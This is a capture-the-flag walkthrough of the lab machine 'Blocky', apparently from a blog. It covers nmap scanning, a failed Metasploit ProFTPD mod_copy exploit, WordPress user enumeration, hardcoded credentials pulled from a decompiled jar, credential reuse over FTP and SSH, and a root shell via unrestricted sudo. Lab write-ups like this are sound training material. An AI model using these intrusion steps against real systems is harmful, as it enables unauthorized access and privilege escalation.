Blocky

Posted on Jul 16, 2021
Nmap scan report for 10.10.10.37
Host is up (0.12s latency).
Not shown: 996 filtered ports
PORT     STATE  SERVICE VERSION
21/tcp   open   ftp     ProFTPD 1.3.5a
22/tcp   open   ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)                                                                     
| ssh-hostkey:
|   2048 d6:2b:99:b4:d5:e7:53:ce:2b:fc:b5:d7:9d:79:fb:a2 (RSA)
|   256 5d:7f:38:95:70:c9:be:ac:67:a0:1e:86:e7:97:84:03 (ECDSA)
|_  256 09:d5:c2:04:95:1a:90:ef:87:56:25:97:df:83:70:67 (ED25519)
80/tcp   open   http    Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 4.8
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: BlockyCraft – Under Construction!
8192/tcp closed sophos   

Running against all ports shows

PORT      STATE  SERVICE
21/tcp    open   ftp
22/tcp    open   ssh
80/tcp    open   http
8192/tcp  closed sophos
25565/tcp open   minecraft

FTP

anonymous login doesn’t work

─$ ftp 10.10.10.37
Connected to 10.10.10.37.
220 ProFTPD 1.3.5a Server (Debian) [::ffff:10.10.10.37]
Name (10.10.10.37:bob): anonymous
331 Password required for anonymous
Password:
530 Login incorrect.
Login failed.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> 

Searchsploit reveals that there two potential RCE exploits that could work

[..]
ProFTPd 1.3.5 - 'mod_copy' Command Execution (Metasploit)                                                              | linux/remote/37262.rb
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution                                                                    | linux/remote/36803.py
[..]

First initial run of the msf exploit doesn’t work

msf6 exploit(unix/ftp/proftpd_modcopy_exec) > run

[*] Started reverse TCP handler on 10.10.16.65:9001 
[*] 10.10.10.37:80 - 10.10.10.37:21 - Connected to FTP server
[*] 10.10.10.37:80 - 10.10.10.37:21 - Sending copy commands to FTP server
[-] 10.10.10.37:80 - Exploit aborted due to failure: unknown: 10.10.10.37:21 - Failure copying from /proc/self/cmdline
[*] Exploit completed, but no session was created.
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > 

Looking at the packets shows that the ftp server requires creds.

  

220 ProFTPD 1.3.5a Server (Debian) \[::ffff:10.10.10.37\]

SITE CPFR /proc/self/cmdline

530 Please login with USER and PASS

Port 80

Greeted by standard wordpress site.

20210412123349.png

We can enumerate users by doing http://10.10.10.37/index.php/?author=1

Which gives us posts made by Notch. incrementing the author ID by 1 doesn’t yield any results.

20210412123604.png

From the gobuster run, we visit http://10.10.10.37/plugins/

Where we can download 2 jar files.

20210412123656.png

We can decompile the jar files with tools from Java Decompiler

We begin by examining BlockyCore.jar with jd-gui.

└─$ java -jar jd-gui-1.6.6.jar                                           
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true

20210412123839.png

From the look of it, it appears to be SQL creds hardcoded in the jar file.

We try to use this password with the user name notch on FTP

Connected to 10.10.10.37.
220 ProFTPD 1.3.5a Server (Debian) [::ffff:10.10.10.37]
Name (10.10.10.37:bob): notch
331 Password required for notch
Password:
230 User notch logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> 

Looks like we got a set of valid creds:

And the directory lists looks like the home directory of notch

  • 20210412124105.png

Trying these creds via ssh gives us a shell as well as the user flag.

Running sudo -l shows that we can run anything as sudo..


notch@Blocky:~$ sudo -l
[sudo] password for notch: 
Matching Defaults entries for notch on Blocky:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User notch may run the following commands on Blocky:
    (ALL : ALL) ALL
notch@Blocky:~$ sudo bash -p
root@Blocky:~# 

ROOTED